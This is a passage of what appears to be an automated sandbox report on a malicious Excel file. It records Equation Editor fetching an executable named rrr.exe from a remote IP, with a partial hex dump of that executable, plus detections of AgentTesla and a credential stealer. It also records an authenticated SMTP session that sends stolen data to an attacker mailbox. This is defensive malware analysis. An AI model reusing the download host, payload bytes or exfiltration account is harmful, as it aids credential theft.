Apr 12, 2021 11:34:51.303776026 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309437037 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309458971 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309469938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309480906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309492111 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309523106 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309536934 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309539080 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309540987 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309595108 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.309669018 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.309714079 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.438644886 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.438839912 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.447814941 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.447979927 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.576726913 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.576817036 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.585711002 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.585787058 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.712960005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.713030100 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.722160101 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.722223997 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.848274946 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.848473072 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.858081102 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.858234882 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.983936071 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.984095097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:52.494642019 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:36:30.855149031 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:31.029679060 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:31.029829979 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:31.577835083 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:31.578409910 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:31.752861023 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:31.752908945 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:31.755284071 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:31.930722952 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:31.931673050 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.109057903 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.110141993 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.285648108 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.286338091 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.477194071 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.477833033 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.652573109 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.655478954 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.655602932 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.656198025 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.656296015 CEST	49166	587	192.168.2.22	208.91.199.225
Apr 12, 2021 11:36:32.830009937 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.830522060 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:32.929917097 CEST	587	49166	208.91.199.225	192.168.2.22
Apr 12, 2021 11:36:33.141093016 CEST	49166	587	192.168.2.22	208.91.199.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 11:36:30.752711058 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 12, 2021 11:36:30.814750910 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 11:36:30.752711058 CEST	192.168.2.22	8.8.8.8	0xb781	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 12, 2021 11:36:30.814750910 CEST	8.8.8.8	192.168.2.22	0xb781	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)
Apr 12, 2021 11:36:30.814750910 CEST	8.8.8.8	192.168.2.22	0xb781	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Apr 12, 2021 11:36:30.814750910 CEST	8.8.8.8	192.168.2.22	0xb781	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Apr 12, 2021 11:36:30.814750910 CEST	8.8.8.8	192.168.2.22	0xb781	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.23.213.61

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	198.23.213.61	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 11:34:49.645109892 CEST	0	OUT	GET /rrr.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.23.213.61 Connection: Keep-Alive
Apr 12, 2021 11:34:49.782322884 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 09:34:49 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Mon, 12 Apr 2021 08:37:15 GMT ETag: "ddc00-5bfc26bb7fa1d" Accept-Ranges: bytes Content-Length: 908288 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 06 74 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 bc 0c 00 00 1e 01 00 00 00 00 00 fe da 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 da 0c 00 4b 00 00 00 00 e0 0c 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 bb 0c 00 00 20 00 00 00 bc 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 1c 01 00 00 e0 0c 00 00 1c 01 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 da 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 da 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ed 0b 00 14 ed 00 00 03 00 00 00 01 00 00 06 f8 13 02 00 98 d9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 23 01 00 00 01 00 00 11 2b 02 26 16 00 38 0a 01 00 00 02 16 38 e8 00 00 00 00 2b 3a 06 1f 63 61 0a 2b 1e 07 1f 6a 61 0b 07 1f 6f 58 45 04 00 00 00 0a 00 00 00 15 00 00 00 27 00 00 00 5d 00 00 00 1f 5d 28 9d 01 00 06 0b 2b d8 d0 01 00 00 06 26 1f fb 0b 2b cd 1f 62 28 9d 01 00 06 0a 1f 64 28 dc 01 00 06 0b 2b bb 06 1f 5c 58 45 0a 00 00 00 0a 00 00 00 13 00 00 00 21 00 00 00 2a 00 00 00 39 00 00 00 48 00 00 00 56 00 00 00 5f 00 00 00 7a 00 00 00 91 00 00 00 1f f8 0b 2b 85 38 79 ff ff ff 00 1f ce 0a 38 70 ff ff ff 00 1f 6a 28 9d 01 00 06 0a 38 62 ff ff ff 00 1f c4 0a 38 59 ff ff ff 02 17 28 07 00 00 0a 1f c9 0a 38 4a ff ff ff 02 17 28 08 00 00 0a 1f c6 0a 38 3b ff ff ff d0 03 00 00 06 26 1f ca 0a 38 2d ff ff ff 00 1f cb 0a 38 24 ff ff ff 02 16 28 09 00 00 0a 2b 0a 28 0a 00 00 0a 38 0e ff ff ff 1f c7 0a 38 09 ff ff ff 02 16 28 0b 00 00 0a 2b 06 00 38 f0 fe ff ff 1f c5 0a 38 f2 fe ff ff 2a 00 13 30 02 00 9d 00 00 00 01 00 00 11 2b 02 26 16 00 00 2b 41 06 1f 71 61 0a 2b 0f 07 1f 6a 61 38 70 00 00 00 07 1f 6b 59 2b 3c 1c 0b 2b ed d0 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt`P @ @K H.text `.rsrc@@.reloc@BH0#+&(((o0#+&88+:ca+jaoXE']](+&+b(d(+\XE!9HV_z+8y8pj(8b8Y(8J(8;&8-8$(+(88(+88*0+&+Aqa+ja8pkY+<+
Apr 12, 2021 11:34:49.782351017 CEST	3	IN	Data Raw: 00 00 06 26 17 0b 2b e3 06 1f 69 59 45 04 00 00 00 0d 00 00 00 31 00 00 00 4e 00 00 00 57 00 00 00 1d 0b 2b c6 1f 1b 0a 1a 0b 2b bf 2b b6 d0 03 00 00 06 26 2b 17 45 04 00 00 00 b3 ff ff ff bd ff ff ff da ff ff ff e1 ff ff ff 2b ad 1f 18 0a 2b 92 Data Ascii: &+iYE1NW+++&+E++(o(++8u8l*0S p MXfYEQe2?q
Apr 12, 2021 11:34:49.782362938 CEST	4	IN	Data Raw: 00 00 00 63 2a 20 f1 7c 43 18 66 20 44 1d 99 eb 61 20 65 9e 25 0c 59 2a 20 85 9e 9f ea 20 73 41 ff 03 61 20 66 21 9f 16 61 20 04 00 00 00 63 2a 20 60 fd ff ff 20 01 00 00 00 63 65 20 04 00 00 00 63 65 2a 20 3d 1e ae 16 20 d0 e1 51 e9 61 2a 20 02 Data Ascii: c* \|Cf Da e%Y* sAa f!a c* ` ce ce* = Qa* f =&Y b* c* ef* Tf _/X gaf* cef* 3a X !3Y Xf* YC Yf c UXe* e*0+&s+&_a
Apr 12, 2021 11:34:49.782378912 CEST	5	IN	Data Raw: 00 02 8c 06 00 00 1b 38 a8 00 00 00 16 2b 03 17 2b 00 2d 12 0f 00 fe 16 06 00 00 1b 6f 1e 00 00 0a 38 85 00 00 00 17 38 7f 00 00 00 07 2c 03 16 2b 03 17 2b 00 3a 07 01 00 00 7e 06 00 00 04 14 fe 03 0c 08 2c 03 16 2b 03 17 2b 00 2d 3a 7e 06 00 00 Data Ascii: 8++-o88,++:~,++-:~(o ,++-rp(!s"z+s#~(o$+8{+9V8N(+\|u%,++-&+%(&o'
Apr 12, 2021 11:34:49.917784929 CEST	7	IN	Data Raw: 00 00 00 00 00 00 2b 02 26 16 03 02 7b 07 00 00 04 fe 01 2b 14 16 2b 03 17 2b 00 2d 02 2b 2d 03 14 fe 03 2c 02 2b 06 2b 07 2c ed 2b e8 16 2b 03 17 2b 00 2d 0b 72 71 00 00 70 73 31 00 00 0a 7a 02 02 7c 07 00 00 04 28 04 00 00 2b 2a 00 03 30 02 00 Data Ascii: +&{+++-+-,++,+++-rqps1z\|(+0G+&{+++-+-,++,+++-rqps1z\|(+0+&++ga+`a8gX+Vc(+ &+`(+aXE
Apr 12, 2021 11:34:49.917829990 CEST	8	IN	Data Raw: 2b 02 26 16 00 7e 0b 00 00 04 0a 2b 00 06 2a 32 2b 02 26 16 00 02 80 0b 00 00 04 2a 13 30 03 00 ef 00 00 00 11 00 00 11 2b 02 26 16 00 00 2b 29 08 20 86 00 00 00 61 0c 2b 15 09 20 86 00 00 00 61 38 c1 00 00 00 09 20 83 00 00 00 58 2b 6d 1f 5d 28 Data Ascii: +&~+2+&0+&+) a+ a8 X+m](+z( +#&`(+ XEER\|++t'](8\|'&+E8y8R+5 8E(#r
Apr 12, 2021 11:34:49.917850971 CEST	10	IN	Data Raw: 00 00 00 67 00 00 00 76 00 00 00 87 00 00 00 96 00 00 00 a1 00 00 00 b1 00 00 00 c3 00 00 00 dc 00 00 00 e8 00 00 00 fc 00 00 00 0b 01 00 00 1f 7f 28 04 00 00 06 13 0b 38 61 ff ff ff 38 53 ff ff ff d0 31 00 00 06 26 1f fb 13 0a 38 44 ff ff ff 07 Data Ascii: gv(8a8S1&8DoD838'(E8oF8('8oD898898(G8
Apr 12, 2021 11:34:49.917876959 CEST	11	IN	Data Raw: 07 20 83 00 00 00 61 0b 2b 12 08 1f 7c 61 38 8b 00 00 00 08 20 84 00 00 00 59 2b 5c 20 fa 00 00 00 0c 2b e6 1f 7a 28 04 00 00 06 0b 20 fb 00 00 00 0c 2b d6 d0 38 00 00 06 26 20 f9 00 00 00 0c 2b c8 07 1f 7d 58 45 04 00 00 00 0a 00 00 00 15 00 00 Data Ascii: a+\|a8 Y+\ +z( +8& +}XE?T ++-G +H&+E+ 8f+8o 8Q*0a+&{QoL8<8)++-90+J
Apr 12, 2021 11:34:49.917897940 CEST	12	IN	Data Raw: 07 6f 50 00 00 06 16 fe 01 0d 09 2c 03 16 2b 03 17 2b 00 2d 14 07 6f 4f 00 00 06 07 6f 51 00 00 06 28 9a 00 00 06 0a 2b 2f 00 00 00 16 0a 2b 1a 45 04 00 00 00 34 ff ff ff 3f ff ff ff 48 ff ff ff 6e ff ff ff 38 2a ff ff ff 06 2c 02 2b 09 2b 07 13 Data Ascii: oP,++-oOoQ(+/+E4?Hn8,++80,+&+1 a+ a8 X8x(+c(+9&+ XE):I++{QoL
Apr 12, 2021 11:34:49.917920113 CEST	14	IN	Data Raw: 00 00 08 20 84 00 00 00 58 2b 58 20 8f 00 00 00 28 07 00 00 06 0c 2b de 07 20 8e 00 00 00 58 45 04 00 00 00 27 00 00 00 53 00 00 00 5d 00 00 00 74 00 00 00 20 8d 00 00 00 28 07 00 00 06 0c 2b b5 1f 78 28 04 00 00 06 0b 1f f5 0c 2b a8 d0 39 00 00 Data Ascii: X+X (+ XE'S]t (+x(+9&++>&+E+_(8e+8[{P+8b8D0;+&{QoL+,+++++-{QoM++
Apr 12, 2021 11:34:49.917943001 CEST	15	IN	Data Raw: 8d 00 00 00 58 45 05 00 00 00 1f 00 00 00 2b 00 00 00 39 00 00 00 47 00 00 00 50 00 00 00 1f 09 0d 2b b3 1f 64 28 dc 01 00 06 0c 1f 0b 0d 2b a6 d0 3d 00 00 06 26 1f 0a 0d 2b 9b 2b 8f 02 16 28 47 00 00 06 1f fb 0c 2b 83 00 1f 5f 28 dc 01 00 06 0c Data Ascii: XE+9GP+d(+=&++(G+_(8u;&8g8^+2{P,++-(G+9/8'+8*09"+&{P88++:{QoT8(U+

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 12, 2021 11:36:31.577835083 CEST	587	49166	208.91.199.225	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 12, 2021 11:36:31.578409910 CEST	49166	587	192.168.2.22	208.91.199.225	EHLO 936905
Apr 12, 2021 11:36:31.752908945 CEST	587	49166	208.91.199.225	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Apr 12, 2021 11:36:31.755284071 CEST	49166	587	192.168.2.22	208.91.199.225	AUTH login cmF6aWxvZ3NAcmF6aWxvZ3MuY29t
Apr 12, 2021 11:36:31.930722952 CEST	587	49166	208.91.199.225	192.168.2.22	334 UGFzc3dvcmQ6
Apr 12, 2021 11:36:32.109057903 CEST	587	49166	208.91.199.225	192.168.2.22	235 2.7.0 Authentication successful
Apr 12, 2021 11:36:32.110141993 CEST	49166	587	192.168.2.22	208.91.199.225	MAIL FROM:<razilogs@razilogs.com>
Apr 12, 2021 11:36:32.285648108 CEST	587	49166	208.91.199.225	192.168.2.22	250 2.1.0 Ok
Apr 12, 2021 11:36:32.286338091 CEST	49166	587	192.168.2.22	208.91.199.225	RCPT TO:<razilogs@razilogs.com>
Apr 12, 2021 11:36:32.477194071 CEST	587	49166	208.91.199.225	192.168.2.22	250 2.1.5 Ok
Apr 12, 2021 11:36:32.477833033 CEST	49166	587	192.168.2.22	208.91.199.225	DATA
Apr 12, 2021 11:36:32.652573109 CEST	587	49166	208.91.199.225	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Apr 12, 2021 11:36:32.656296015 CEST	49166	587	192.168.2.22	208.91.199.225	.
Apr 12, 2021 11:36:32.929917097 CEST	587	49166	208.91.199.225	192.168.2.22	250 2.0.0 Ok: queued as 6229B7824B7

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1552 Parent PID: 584

General

Start time:	11:34:34
Start date:	12/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fe30000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2332 Parent PID: 584

General

Start time:	11:34:56
Start date:	12/04/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2916 Parent PID: 2332

General

Start time:	11:34:59
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xf60000
File size:	908288 bytes
MD5 hash:	ABEB7AA739C4F99C996B91E51A1FA885
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 3044 Parent PID: 2916

General

Start time:	11:35:08
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xf60000
File size:	908288 bytes
MD5 hash:	ABEB7AA739C4F99C996B91E51A1FA885
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2916 Parent PID: 2332 vbc.exeCOMMON

Executed Functions

Function 00662D18, Relevance: 5.2, Strings: 4, Instructions: 242COMMON

Download Yara Rule

Strings

8w!, xrefs: 00662DF4
N/#B, xrefs: 00662F9F
N/#B, xrefs: 00662FAD
8w!, xrefs: 00662DE9

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID: 8w!$8w!$N/#B$N/#B
API String ID: 0-223033658
Opcode ID: 6c6f4f4716724569d6f54b5a5ccdd1e1dee3bb6ce243d8c7cc37404a75b25a3a
Instruction ID: 25ffd94278eeb39d33ad48130868bfeb40497ef08c1853d6f9480bef4b8d34cd
Opcode Fuzzy Hash: 6c6f4f4716724569d6f54b5a5ccdd1e1dee3bb6ce243d8c7cc37404a75b25a3a
Instruction Fuzzy Hash: E6B13270D14619CFDB24DFA8C9946DDBBB2BF89300F20946AD40ABB364DB345946DF24

Uniqueness

Uniqueness Score: -1.00%

Function 0021A723, Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

?5T, xrefs: 0021AA5E
y, xrefs: 0021A807
y, xrefs: 0021A80E

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: ?5T$y$y
API String ID: 0-3840715023
Opcode ID: 18d2792b056d4bb1d45429ce16cb9f75e2766c6c9f5bc9bb18683edaf224d6bd
Instruction ID: bf2031a60d62b04d7e4e3ca0fb4bbd74013ffcded0004a2ee652e9fc65f49a86
Opcode Fuzzy Hash: 18d2792b056d4bb1d45429ce16cb9f75e2766c6c9f5bc9bb18683edaf224d6bd
Instruction Fuzzy Hash: 07D16A70D2520ACFCB05CFA5C4808EEFBB2FF99311B20956AD406AB255D7349A93DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0021A778, Relevance: 4.0, Strings: 3, Instructions: 278COMMON

Download Yara Rule

Strings

?5T, xrefs: 0021AA5E
y, xrefs: 0021A807
y, xrefs: 0021A80E

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: ?5T$y$y
API String ID: 0-3840715023
Opcode ID: 128fdbfac4cb4b9af0224dfb5b52cfd9b82fd5b40af653340c196e56934896c6
Instruction ID: ce533d555b5e803bcbf5a90183a2b9b485ca3e073d461f7b254c74f7a131003c
Opcode Fuzzy Hash: 128fdbfac4cb4b9af0224dfb5b52cfd9b82fd5b40af653340c196e56934896c6
Instruction Fuzzy Hash: DEC13A70D2520ACFCB04CFA5C4848EEFBB2FF99350F20956AD416AB254D7349A92DF91

Uniqueness

Uniqueness Score: -1.00%

Function 006601A8, Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

8w!, xrefs: 006603FF
vc ;, xrefs: 006601FB

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID: 8w!$vc ;
API String ID: 0-3258868204
Opcode ID: dd4160d4b675374cfb48aac26f69eac0672f663ff14bd96e85592a7848909107
Instruction ID: 64f2effafa6306f9de1aa0442bbc620ad91f69d8359603e410de71a6500bcef6
Opcode Fuzzy Hash: dd4160d4b675374cfb48aac26f69eac0672f663ff14bd96e85592a7848909107
Instruction Fuzzy Hash: BD71F1B4D41209DFEB44CFE5D9886AEBBB2FB89301F20942AD416BB354DB705A42CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00661BB8, Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00661C75

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 7800060b95706f708130de1d315e35fe4c0b60a76b0904c8c4f3ce5bbfb9d27d
Instruction ID: 42a2e78b705c35eb8c56671e1f755d8199f6a360cac8f75630b66b5a860ee463
Opcode Fuzzy Hash: 7800060b95706f708130de1d315e35fe4c0b60a76b0904c8c4f3ce5bbfb9d27d
Instruction Fuzzy Hash: A34178B8D052589FCF10CFA9D984ADEFBB1BB4A314F24942AE814B7310D375A906CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00661BC0, Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00661C75

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f50690909276129884815c9b24e2e6a676164acc360bdcb5720ff588c08cd9cf
Instruction ID: 8adb8044720b9a3707b4aee0a4ffc0d84bef6521f49cc848a859bf594c09964c
Opcode Fuzzy Hash: f50690909276129884815c9b24e2e6a676164acc360bdcb5720ff588c08cd9cf
Instruction Fuzzy Hash: CB4168B8D002589FCF10CFA9D984ADEFBB5BB09314F24942AE814B7310D375A905CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00664051, Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

Iv4, xrefs: 006642A0

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID: Iv4
API String ID: 0-214277628
Opcode ID: b6497f95bab8895cb8e322d01c8c77ba5a46972313e3dedc6916aa87b7473f89
Instruction ID: 2845064f795f0af77fda6ebbfa7f626025cc2dfecb52f9be536224104f89fbeb
Opcode Fuzzy Hash: b6497f95bab8895cb8e322d01c8c77ba5a46972313e3dedc6916aa87b7473f89
Instruction Fuzzy Hash: 9DB13474E00219CBCB04CFE9C5449EEFBF2EF99314F24856AD405AB318DB349942CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00218620, Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

g, xrefs: 0021876D

Memory Dump Source

